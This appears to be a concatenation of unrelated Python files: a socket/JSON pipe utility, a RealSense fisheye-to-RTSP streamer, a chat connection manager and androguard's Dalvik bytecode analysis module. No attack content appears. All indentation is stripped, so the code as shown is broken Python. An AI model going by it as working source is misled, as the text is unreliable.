# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def set_recv_time(self):
self.recv_time = time.time()
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
fisheye_stream_to_rtsp.py
|
#!/usr/bin/env python3
import sys
sys.path.append('/usr/local/lib/')
import pyrealsense2 as rs
import cv2
import gi
import time
import numpy as np
gi.require_version('Gst', '1.0')
gi.require_version('GstRtspServer', '1.0')
from gi.repository import Gst, GstRtspServer, GLib
frame_left = None
frame_right = None
last_process = time.time()
class SensorFactory(GstRtspServer.RTSPMediaFactory):
def __init__(self, frame_type = 1, **properties):
super(SensorFactory, self).__init__(**properties)
self.frame_type = frame_type
self.number_frames = 0
self.fps = 60
self.duration = 1 / self.fps * Gst.SECOND
self.launch_string = 'appsrc name=source is-live=true block=true format=GST_FORMAT_TIME ' \
'caps=video/x-raw,format=RGB,width=848,height=800,framerate={}/1 ' \
'! videoconvert ! video/x-raw,format=I420 ' \
'! x264enc speed-preset=ultrafast tune=zerolatency ' \
'! rtph264pay config-interval=1 name=pay0 pt=96'.format(self.fps)
def on_need_data(self, src, length):
global frame_left
global frame_right
frame = None
if self.frame_type == 1:
frame = frame_left
elif self.frame_type == 2:
frame = frame_right
if frame is not None:
data = frame.tobytes()
buf = Gst.Buffer.new_allocate(None, len(data), None)
buf.fill(0, data)
buf.duration = self.duration
timestamp = self.number_frames * self.duration
buf.pts = buf.dts = int(timestamp)
buf.offset = timestamp
self.number_frames += 1
retval = src.emit('push-buffer', buf)
last_process = time.time()
if retval != Gst.FlowReturn.OK:
print(retval)
def do_create_element(self, url):
return Gst.parse_launch(self.launch_string)
def do_configure(self, rtsp_media):
self.number_frames = 0
appsrc = rtsp_media.get_element().get_child_by_name('source')
appsrc.connect('need-data', self.on_need_data)
class GstServer(GstRtspServer.RTSPServer):
def __init__(self, **properties):
super(GstServer, self).__init__(**properties)
for i in [1,2]:
factory = SensorFactory(i)
factory.set_shared(True)
self.get_mount_points().add_factory(f"/fisheye/{i}", factory)
self.attach(None)
Gst.init(None)
server = GstServer()
def t265_loop():
global frame_left
global frame_right
print("T265 thread start...")
pipe = rs.pipeline()
cfg = rs.config()
profile = pipe.start(cfg)
print("Device connected")
while True:
frames = pipe.wait_for_frames()
image_left = np.asanyarray(frames.get_fisheye_frame(1).get_data())
image_right = np.asanyarray(frames.get_fisheye_frame(2).get_data())
frame_left = cv2.cvtColor(image_left, cv2.COLOR_GRAY2RGB)
frame_right = cv2.cvtColor(image_right, cv2.COLOR_GRAY2RGB)
import threading
threading.Thread(target=t265_loop, args=()).start()
loop = GLib.MainLoop()
loop.run()
|
global_manager.py
|
from multiprocessing import Lock
from threading import Thread
from message import *
class GlobalManger(object):
__instance = None
__inited = False
_l = Lock()
def __new__(cls, *args, **kwargs):
if not cls.__instance:
cls.__instance = super().__new__(cls)
return cls.__instance
def __init__(self):
self._l.acquire()
if not self.__inited:
self.__inited = True
self.__server = True
# self.__login_ids = set()
self.__connected = {}
self.__save_msg = {}
self._l.release()
def add_connect(self, id_: str, trans):
self._l.acquire()
if self.__server:
# self.__login_ids.add(id_)
self.__connected[id_] = trans
if self.__save_msg.get(id_):
Thread(target=self._notify_connect, kwargs={'key': id_, 'conn': trans}).start()
self._l.release()
print('add_connect', id_, trans)
def del_connect(self, id_):
conn = None
self._l.acquire()
if self.__server:
if self.__connected.get(id_):
# self.__login_ids.remove(id_)
conn = self.__connected.pop(id_)
self._l.release()
print('del_connect', conn)
def is_login(self, id_):
ret = False
self._l.acquire()
if self.__server:
if self.__connected.get(id_):
ret = True
self._l.release()
return ret
def send_msg2id(self, toid, msg) -> bool:
ret = False
self._l.acquire()
if self.__server:
trans = self.__connected.get(toid)
if trans:
ret = trans.recv_notify(msg)
else: # 如果对方不在线则保存请求和同意消息, 等待对方上线再通知其处理
self._save_msg(toid, msg)
ret = True
self._l.release()
return ret
def _save_msg(self, toid, msg):
if type(msg) == RetOnlineNotifyMsg:
return
if not self.__save_msg.get(toid):
self.__save_msg[toid] = []
self.__save_msg[toid].append(msg)
if len(self.__save_msg[toid]) > 1000:
del self.__save_msg[toid][0]
@staticmethod
def _add_msg2dict(msg, d, key, limit):
if not d.get(key):
d[key] = []
d[key].append(msg)
if len(d[key]) > limit:
del d[key][0]
@use_log
def _notify_connect(self, conn, key):
""" 如果再下线期间有没收到的消息,则上线后再通知 """
print(conn, key)
for msg in self.__save_msg[key]:
conn.recv_notify(msg)
self._l.acquire()
del self.__save_msg[key]
self._l.release()
@use_log
def close_all_connect(self):
self._l.acquire()
self.__server = False
self._l.release()
for key, trans in self.__connected.items():
trans.ready2exit()
del self.__connected[key]
|
analysis.py
|
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
import re
import collections
import threading
import queue
import time
from androguard.core.androconf import warning, debug, is_ascii_problem
from androguard.core.bytecodes import dvm
class DVMBasicBlock(object):
"""
A simple basic block of a dalvik method
"""
def __init__(self, start, vm, method, context):
self.__vm = vm
self.method = method
self.context = context
self.last_length = 0
self.nb_instructions = 0
self.fathers = []
self.childs = []
self.start = start
self.end = self.start
self.special_ins = {}
self.name = "%s-BB@0x%x" % (self.method.get_name(), self.start)
self.exception_analysis = None
self.notes = []
self.__cached_instructions = None
def get_notes(self):
return self.notes
def set_notes(self, value):
self.notes = [value]
def add_note(self, note):
self.notes.append(note)
def clear_notes(self):
self.notes = []
def get_instructions(self):
"""
Get all instructions from a basic block.
:rtype: Return all instructions in the current basic block
"""
tmp_ins = []
idx = 0
for i in self.method.get_instructions():
if self.start <= idx < self.end:
yield i
idx += i.get_length()
def get_nb_instructions(self):
return self.nb_instructions
def get_method(self):
return self.method
def get_name(self):
return "%s-BB@0x%x" % (self.method.get_name(), self.start)
def get_start(self):
return self.start
def get_end(self):
return self.end
def get_last(self):
return self.get_instructions()[-1]
def get_next(self):
"""
Get next basic blocks
:rtype: a list of the next basic blocks
"""
return self.childs
def get_prev(self):
"""
Get previous basic blocks
:rtype: a list of the previous basic blocks
"""
return self.fathers
def set_fathers(self, f):
self.fathers.append(f)
def get_last_length(self):
return self.last_length
def set_childs(self, values):
# print self, self.start, self.end, values
if not values:
next_block = self.context.get_basic_block(self.end + 1)
if next_block is not None:
self.childs.append((self.end - self.get_last_length(), self.end,
next_block))
else:
for i in values:
if i != -1:
next_block = self.context.get_basic_block(i)
if next_block is not None:
self.childs.append((self.end - self.get_last_length(),
i, next_block))
for c in self.childs:
if c[2] is not None:
c[2].set_fathers((c[1], c[0], self))
def push(self, i):
self.nb_instructions += 1
idx = self.end
self.last_length = i.get_length()
self.end += self.last_length
op_value = i.get_op_value()
if op_value == 0x26 or (0x2b <= op_value <= 0x2c):
code = self.method.get_code().get_bc()
self.special_ins[idx] = code.get_ins_off(idx + i.get_ref_off() * 2)
def get_special_ins(self, idx):
"""
Return the associated instruction to a specific instruction (for example a packed/sparse switch)
:param idx: the index of the instruction
:rtype: None or an Instruction
"""
try:
return self.special_ins[idx]
# FIXME: Too broad exception clause
except:
return None
def get_exception_analysis(self):
return self.exception_analysis
def set_exception_analysis(self, exception_analysis):
self.exception_analysis = exception_analysis
def show(self):
print(self.get_name(), self.get_start(), self.get_end())
class Enum(object):
def __init__(self, names):
self.names = names
for value, name in enumerate(self.names):
setattr(self, name.upper(), value)
def tuples(self):
return tuple(enumerate(self.names))
TAG_ANDROID = Enum(
['ANDROID', 'TELEPHONY', 'SMS', 'SMSMESSAGE', 'ACCESSIBILITYSERVICE',
'ACCOUNTS', 'ANIMATION', 'APP', 'BLUETOOTH', 'CONTENT', 'DATABASE',
'DEBUG', 'DRM', 'GESTURE', 'GRAPHICS', 'HARDWARE', 'INPUTMETHODSERVICE',
'LOCATION', 'MEDIA', 'MTP', 'NET', 'NFC', 'OPENGL', 'OS', 'PREFERENCE',
'PROVIDER', 'RENDERSCRIPT', 'SAX', 'SECURITY', 'SERVICE', 'SPEECH',
'SUPPORT', 'TEST', 'TEXT', 'UTIL', 'VIEW', 'WEBKIT', 'WIDGET',
'DALVIK_BYTECODE', 'DALVIK_SYSTEM', 'JAVA_REFLECTION'])
TAG_REVERSE_ANDROID = dict((i[0], i[1]) for i in TAG_ANDROID.tuples())
TAGS_ANDROID = {
TAG_ANDROID.ANDROID: [0, "Landroid"],
TAG_ANDROID.TELEPHONY: [0, "Landroid/telephony"],
TAG_ANDROID.SMS: [0, "Landroid/telephony/SmsManager"],
TAG_ANDROID.SMSMESSAGE: [0, "Landroid/telephony/SmsMessage"],
TAG_ANDROID.DEBUG: [0, "Landroid/os/Debug"],
TAG_ANDROID.ACCESSIBILITYSERVICE: [0, "Landroid/accessibilityservice"],
TAG_ANDROID.ACCOUNTS: [0, "Landroid/accounts"],
TAG_ANDROID.ANIMATION: [0, "Landroid/animation"],
TAG_ANDROID.APP: [0, "Landroid/app"],
TAG_ANDROID.BLUETOOTH: [0, "Landroid/bluetooth"],
TAG_ANDROID.CONTENT: [0, "Landroid/content"],
TAG_ANDROID.DATABASE: [0, "Landroid/database"],
TAG_ANDROID.DRM: [0, "Landroid/drm"],
TAG_ANDROID.GESTURE: [0, "Landroid/gesture"],
TAG_ANDROID.GRAPHICS: [0, "Landroid/graphics"],
TAG_ANDROID.HARDWARE: [0, "Landroid/hardware"],
TAG_ANDROID.INPUTMETHODSERVICE: [0, "Landroid/inputmethodservice"],
TAG_ANDROID.LOCATION: [0, "Landroid/location"],
TAG_ANDROID.MEDIA: [0, "Landroid/media"],
TAG_ANDROID.MTP: [0, "Landroid/mtp"],
TAG_ANDROID.NET: [0, "Landroid/net"],
TAG_ANDROID.NFC: [0, "Landroid/nfc"],
TAG_ANDROID.OPENGL: [0, "Landroid/opengl"],
TAG_ANDROID.OS: [0, "Landroid/os"],
TAG_ANDROID.PREFERENCE: [0, "Landroid/preference"],
TAG_ANDROID.PROVIDER: [0, "Landroid/provider"],
TAG_ANDROID.RENDERSCRIPT: [0, "Landroid/renderscript"],
TAG_ANDROID.SAX: [0, "Landroid/sax"],
TAG_ANDROID.SECURITY: [0, "Landroid/security"],
TAG_ANDROID.SERVICE: [0, "Landroid/service"],
TAG_ANDROID.SPEECH: [0, "Landroid/speech"],
TAG_ANDROID.SUPPORT: [0, "Landroid/support"],
TAG_ANDROID.TEST: [0, "Landroid/test"],
TAG_ANDROID.TEXT: [0, "Landroid/text"],
TAG_ANDROID.UTIL: [0, "Landroid/util"],
TAG_ANDROID.VIEW: [0, "Landroid/view"],
TAG_ANDROID.WEBKIT: [0, "Landroid/webkit"],
TAG_ANDROID.WIDGET: [0, "Landroid/widget"],
TAG_ANDROID.DALVIK_BYTECODE: [0, "Ldalvik/bytecode"],
TAG_ANDROID.DALVIK_SYSTEM: [0, "Ldalvik/system"],
TAG_ANDROID.JAVA_REFLECTION: [0, "Ljava/lang/reflect"],
}
class Tags(object):
"""
Handle specific tags
:param patterns:
:params reverse:
"""
def __init__(self, patterns=TAGS_ANDROID, reverse=TAG_REVERSE_ANDROID):
self.tags = set()
self.patterns = patterns
self.reverse = TAG_REVERSE_ANDROID
for i in self.patterns:
self.patterns[i][1] = re.compile(self.patterns[i][1])
def emit(self, method):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search(method.get_class()) is not None:
self.tags.add(i)
def emit_by_classname(self, classname):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search(classname) is not None:
self.tags.add(i)
def get_list(self):
return [self.reverse[i] for i in self.tags]
def __contains__(self, key):
return key in self.tags
def __str__(self):
return str([self.reverse[i] for i in self.tags])
def empty(self):
return self.tags == set()
class BasicBlocks(object):
"""
This class represents all basic blocks of a method
"""
def __init__(self, _vm):
self.__vm = _vm
self.bb = []
def push(self, bb):
self.bb.append(bb)
def pop(self, idx):
return self.bb.pop(idx)
def get_basic_block(self, idx):
for i in self.bb:
if i.get_start() <= idx < i.get_end():
return i
return None
def get(self):
"""
:rtype: return each basic block (:class:`DVMBasicBlock` object)
"""
for i in self.bb:
yield i
def gets(self):
"""
:rtype: a list of basic blocks (:class:`DVMBasicBlock` objects)
"""
return self.bb
def get_basic_block_pos(self, idx):
return self.bb[idx]
class ExceptionAnalysis(object):
def __init__(self, exception, bb):
self.start = exception[0]
self.end = exception[1]
self.exceptions = exception[2:]
for i in self.exceptions:
i.append(bb.get_basic_block(i[1]))
def show_buff(self):
buff = "%x:%x\n" % (self.start, self.end)
for i in self.exceptions:
if i[2] is None:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2])
else:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2].get_name())
return buff[:-1]
def get(self):
d = {"start": self.start, "end": self.end, "list": []}
for i in self.exceptions:
d["list"].append({"name": i[0], "idx": i[1], "bb": i[2].get_name()})
return d
class Exceptions(object):
def __init__(self, _vm):
self.__vm = _vm
self.exceptions = []
def add(self, exceptions, basic_blocks):
for i in exceptions:
self.exceptions.append(ExceptionAnalysis(i, basic_blocks))
def get_exception(self, addr_start, addr_end):
for i in self.exceptions:
# print hex(i.start), hex(i.end), hex(addr_start), hex(addr_end), i.start >= addr_start and i.end <= addr_end, addr_end <= i.end and addr_start >= i.start
if i.start >= addr_start and i.end <= addr_end:
return i
elif addr_end <= i.end and addr_start >= i.start:
return i
return None
def gets(self):
return self.exceptions
def get(self):
for i in self.exceptions:
yield i
BasicOPCODES = []
for i in dvm.BRANCH_DVM_OPCODES:
BasicOPCODES.append(re.compile(i))
class MethodAnalysis(object):
"""
This class analyses in details a method of a class/dex file
:type vm: a :class:`DalvikVMFormat` object
:type method: a :class:`EncodedMethod` object
"""
def __init__(self, vm, method):
self.__vm = vm
self.method = method
self.basic_blocks = BasicBlocks(self.__vm)
self.exceptions = Exceptions(self.__vm)
self.code = self.method.get_code()
if self.code is None:
return
current_basic = DVMBasicBlock(0, self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
##########################################################
bc = self.code.get_bc()
l = []
h = {}
idx = 0
debug("Parsing instructions")
for i in bc.get_instructions():
for j in BasicOPCODES:
if j.match(i.get_name()) is not None:
v = dvm.determineNext(i, idx, self.method)
h[idx] = v
l.extend(v)
break
idx += i.get_length()
debug("Parsing exceptions")
excepts = dvm.determineException(self.__vm, self.method)
for i in excepts:
l.extend([i[0]])
for handler in i[2:]:
l.append(handler[1])
debug("Creating basic blocks in %s" % self.method)
idx = 0
for i in bc.get_instructions():
# index is a destination
if idx in l:
if current_basic.get_nb_instructions() != 0:
current_basic = DVMBasicBlock(current_basic.get_end(),
self.__vm, self.method,
self.basic_blocks)
self.basic_blocks.push(current_basic)
current_basic.push(i)
# index is a branch instruction
if idx in h:
current_basic = DVMBasicBlock(current_basic.get_end(),
self.__vm, self.method,
self.basic_blocks)
self.basic_blocks.push(current_basic)
idx += i.get_length()
if current_basic.get_nb_instructions() == 0:
self.basic_blocks.pop(-1)
debug("Settings basic blocks childs")
for i in self.basic_blocks.get():
try:
i.set_childs(h[i.end - i.get_last_length()])
except KeyError:
i.set_childs([])
debug("Creating exceptions")
# Create exceptions
self.exceptions.add(excepts, self.basic_blocks)
for i in self.basic_blocks.get():
# setup exception by basic block
i.set_exception_analysis(self.exceptions.get_exception(i.start,
i.end - 1))
del h, l
def get_basic_blocks(self):
"""
:rtype: a :class:`BasicBlocks` object
"""
return self.basic_blocks
def get_length(self):
"""
:rtype: an integer which is the length of the code
"""
return self.code.get_length() if self.code else 0
def get_vm(self):
return self.__vm
def get_method(self):
return self.method
def show(self):
print("METHOD", self.method.get_class_name(), self.method.get_name(
), self.method.get_descriptor())
for i in self.basic_blocks.get():
print("\t", i)
i.show()
print("")
def show_methods(self):
print("\t #METHODS :")
for i in self.__bb:
methods = i.get_methods()
for method in methods:
print("\t\t-->", method.get_class_name(), method.get_name(
), method.get_descriptor())
for context in methods[method]:
print("\t\t\t |---|", context.details)
def get_tags(self):
"""
Return the tags of the method
:rtype: a :class:`Tags` object
"""
return self.tags
class StringAnalysis(object):
def __init__(self, value):
self.value = value
self.orig_value = value
self.xreffrom = set()
def AddXrefFrom(self, classobj, methodobj):
# debug("Added strings xreffrom for %s to %s" % (self.value, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def set_value(self, value):
self.value = value
def get_value(self):
return self.value
def get_orig_value(self):
return self.orig_value
def __str__(self):
data = "XREFto for string %s in\n" % repr(self.get_value())
for ref_class, ref_method in self.xreffrom:
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
return data
class MethodClassAnalysis(object):
def __init__(self, method):
self.method = method
self.xrefto = set()
self.xreffrom = set()
def AddXrefTo(self, classobj, methodobj, offset):
# debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefto.add((classobj, methodobj, offset))
def AddXrefFrom(self, classobj, methodobj, offset):
# debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xreffrom.add((classobj, methodobj, offset))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def __str__(self):
data = "XREFto for %s\n" % self.method
for ref_class, ref_method, offset in self.xrefto:
data += "in\n"
data += "%s:%s @0x%x\n" % (ref_class.get_vm_class().get_name(), ref_method, offset
)
data += "XREFFrom for %s\n" % self.method
for ref_class, ref_method, offset in self.xreffrom:
data += "in\n"
data += "%s:%s @0x%x\n" % (ref_class.get_vm_class().get_name(), ref_method, offset
)
return data
class FieldClassAnalysis(object):
def __init__(self, field):
self.field = field
self.xrefread = set()
self.xrefwrite = set()
def AddXrefRead(self, classobj, methodobj):
# debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefread.add((classobj, methodobj))
def AddXrefWrite(self, classobj, methodobj):
# debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefwrite.add((classobj, methodobj))
def get_xref_read(self):
return self.xrefread
def get_xref_write(self):
return self.xrefwrite
def __str__(self):
data = "XREFRead for %s\n" % self.field
for ref_class, ref_method in self.xrefread:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
data += "XREFWrite for %s\n" % self.field
for ref_class, ref_method in self.xrefwrite:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
return data
REF_NEW_INSTANCE = 0
REF_CLASS_USAGE = 1
class ExternalClass(object):
def __init__(self, name):
self.name = name
self.methods = {}
def get_methods(self):
return self.methods.values()
def GetMethod(self, name, descriptor):
key = name + str(descriptor)
if key not in self.methods:
self.methods[key] = ExternalMethod(self.name, name, descriptor)
return self.methods[key]
class ExternalMethod(object):
def __init__(self, class_name, name, descriptor):
self.class_name = class_name
self.name = name
self.descriptor = descriptor
def get_name(self):
return self.name
def get_class_name(self):
return self.class_name
def get_descriptor(self):
return ''.join(self.descriptor)
def __str__(self):
return "%s->%s%s" % (self.class_name, self.name, ''.join(self.descriptor))
class ClassAnalysis(object):
def __init__(self, classobj, internal=False):
self.orig_class = classobj
self._inherits_methods = {}
self._methods = {}
self._fields = {}
self.internal = internal
self.xrefto = collections.defaultdict(set)
self.xreffrom = collections.defaultdict(set)
def get_methods(self):
return list(self._methods.values())
def get_nb_methods(self):
return len(self._methods)
def get_method_analysis(self, method):
return self._methods.get(method)
def get_field_analysis(self, field):
return self._fields.get(field)
def GetFakeMethod(self, name, descriptor):
if not self.internal:
return self.orig_class.GetMethod(name, descriptor)
# We are searching an unknown method in this class
# It could be something that the class herits
key = name + str(descriptor)
if key not in self._inherits_methods:
self._inherits_methods[key] = ExternalMethod(self.orig_class.get_name(), name, descriptor)
return self._inherits_methods[key]
def AddFXrefRead(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefRead(classobj, method)
def AddFXrefWrite(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefWrite(classobj, method)
def AddMXrefTo(self, method1, classobj, method2, offset):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefTo(classobj, method2, offset)
def AddMXrefFrom(self, method1, classobj, method2, offset):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefFrom(classobj, method2, offset)
def AddXrefTo(self, ref_kind, classobj, methodobj, offset):
self.xrefto[classobj].add((ref_kind, methodobj, offset))
def AddXrefFrom(self, ref_kind, classobj, methodobj, offset):
self.xreffrom[classobj].add((ref_kind, methodobj, offset))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def get_vm_class(self):
return self.orig_class
def __str__(self):
# Print only instanceiations from other classes here
# TODO also method xref and field xref should be printed?
data = "XREFto for %s\n" % self.orig_class
for ref_class in self.xrefto:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method, ref_offset in self.xrefto[ref_class]:
data += "%d %s 0x%x\n" % (ref_kind, ref_method, ref_offset)
data += "\n"
data += "XREFFrom for %s\n" % self.orig_class
for ref_class in self.xreffrom:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method, ref_offset in self.xreffrom[ref_class]:
data += "%d %s 0x%x\n" % (ref_kind, ref_method, ref_offset)
data += "\n"
return data
class Analysis(object):
def __init__(self, vm):
self.vms = [vm]
self.classes = {}
self.strings = {}
self.methods = {}
for current_class in vm.get_classes():
self.classes[current_class.get_name()] = ClassAnalysis(
current_class, True)
for method in vm.get_methods():
self.methods[method] = MethodAnalysis(vm, method)
def create_xref(self):
debug("Creating XREF/DREF")
started_at = time.time()
instances_class_name = list(self.classes.keys())
queue_classes = queue.Queue()
last_vm = self.vms[-1]
for current_class in last_vm.get_classes():
queue_classes.put(current_class)
threads = []
# TODO maybe adjust this number by the
# number of cores or make it configureable?
for n in range(2):
thread = threading.Thread(target=self._create_xref, args=(instances_class_name, last_vm, queue_classes))
thread.daemon = True
thread.start()
threads.append(thread)
debug("Waiting all threads")
queue_classes.join()
debug("")
diff = time.time() - started_at
debug("End of creating XREF/DREF {:.0f}:{:.2f}".format(*divmod(diff, 60)))
def _create_xref(self, instances_class_name, last_vm, queue_classes):
while not queue_classes.empty():
current_class = queue_classes.get()
debug("Creating XREF/DREF for %s" % current_class.get_name())
for current_method in current_class.get_methods():
debug("Creating XREF for %s" % current_method)
code = current_method.get_code()
if code is None:
continue
off = 0
bc = code.get_bc()
try:
for instruction in bc.get_instructions():
op_value = instruction.get_op_value()
if op_value in [0x1c, 0x22]:
idx_type = instruction.get_ref_kind()
type_info = last_vm.get_cm_type(idx_type)
# Internal xref related to class manipulation
if type_info in instances_class_name and type_info != current_class.get_name(
):
# new instance
if op_value == 0x22:
self.classes[current_class.get_name(
)].AddXrefTo(REF_NEW_INSTANCE,
self.classes[type_info],
current_method, off)
self.classes[type_info].AddXrefFrom(
REF_NEW_INSTANCE,
self.classes[current_class.get_name()],
current_method, off)
# class reference
else:
self.classes[current_class.get_name(
)].AddXrefTo(REF_CLASS_USAGE,
self.classes[type_info],
current_method, off)
self.classes[type_info].AddXrefFrom(
REF_CLASS_USAGE,
self.classes[current_class.get_name()],
current_method, off)
elif ((0x6e <= op_value <= 0x72) or
(0x74 <= op_value <= 0x78)):
idx_meth = instruction.get_ref_kind()
method_info = last_vm.get_cm_method(idx_meth)
if method_info:
class_info = method_info[0]
method_item = last_vm.get_method_descriptor(
method_info[0], method_info[1],
''.join(method_info[2]))
# Seems to be an external classes
if not method_item:
if method_info[0] not in self.classes:
self.classes[method_info[0]] = ClassAnalysis(ExternalClass(method_info[0]),
False)
method_item = self.classes[method_info[0]].GetFakeMethod(method_info[1],
method_info[2])
if method_item:
self.classes[current_class.get_name(
)].AddMXrefTo(current_method,
self.classes[class_info],
method_item,
off)
self.classes[class_info].AddMXrefFrom(
method_item,
self.classes[current_class.get_name()],
current_method,
off)
# Internal xref related to class manipulation
if class_info in instances_class_name and class_info != current_class.get_name(
):
self.classes[current_class.get_name(
)].AddXrefTo(REF_CLASS_USAGE,
self.classes[class_info],
method_item, off)
self.classes[class_info].AddXrefFrom(
REF_CLASS_USAGE,
self.classes[current_class.get_name()],
current_method, off)
elif 0x1a <= op_value <= 0x1b:
string_value = last_vm.get_cm_string(
instruction.get_ref_kind())
if string_value not in self.strings:
self.strings[string_value] = StringAnalysis(
string_value)
self.strings[string_value].AddXrefFrom(
self.classes[current_class.get_name()],
current_method)
elif 0x52 <= op_value <= 0x6d:
idx_field = instruction.get_ref_kind()
field_info = last_vm.get_cm_field(idx_field)
field_item = last_vm.get_field_descriptor(
field_info[0], field_info[2], field_info[1])
if field_item:
# read access to a field
if (0x52 <= op_value <= 0x58) or (
0x60 <= op_value <= 0x66):
self.classes[current_class.get_name(
)].AddFXrefRead(
current_method,
self.classes[current_class.get_name()],
field_item)
# write access to a field
else:
self.classes[current_class.get_name(
)].AddFXrefWrite(
current_method,
self.classes[current_class.get_name()],
field_item)
off += instruction.get_length()
except dvm.InvalidInstruction as e:
warning("Invalid instruction %s" % str(e))
queue_classes.task_done()
def get_method(self, method):
"""
:param method:
:return: `MethodAnalysis` object for the given method
"""
if method in self.methods:
return self.methods[method]
else:
return None
def get_method_by_name(self, class_name, method_name, method_descriptor):
if class_name in self.classes:
for method in self.classes[class_name].get_vm_class().get_methods():
if method.get_name() == method_name and method.get_descriptor(
) == method_descriptor:
return method
return None
def get_method_analysis(self, method):
"""
:param method:
:return: `MethodClassAnalysis` for the given method
"""
class_analysis = self.get_class_analysis(method.get_class_name())
if class_analysis:
return class_analysis.get_method_analysis(method)
return None
def get_method_analysis_by_name(self, class_name, method_name, method_descriptor):
method = self.get_method_by_name(class_name, method_name, method_descriptor)
if method:
return self.get_method_analysis(method)
return None
def get_field_analysis(self, field):
class_analysis = self.get_class_analysis(field.get_class_name())
if class_analysis:
return class_analysis.get_field_analysis(field)
return None
def is_class_present(self, class_name):
return class_name in self.classes
def get_class_analysis(self, class_name):
return self.classes.get(class_name)
def get_external_classes(self):
for i in self.classes:
if not self.classes[i].internal:
yield self.classes[i]
def get_strings_analysis(self):
return self.strings
def add(self, vm):
self.vms.append(vm)
for current_class in vm.get_classes():
if current_class.get_name() not in self.classes:
self.classes[current_class.get_name()] = ClassAnalysis(
current_class, True)
def is_ascii_obfuscation(vm):
for classe in vm.get_classes():
if is_ascii_problem(classe.get_name()):
return True
for method in classe.get_methods():
if is_ascii_problem(method.get_name()):
return True
return False
|
utils.py
|
import os
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from tempfile import mkdtemp
import requests
import requests_cache
from . import get_logger
lgr = get_logger()
class LoggingRequestHandler(SimpleHTTPRequestHandler):
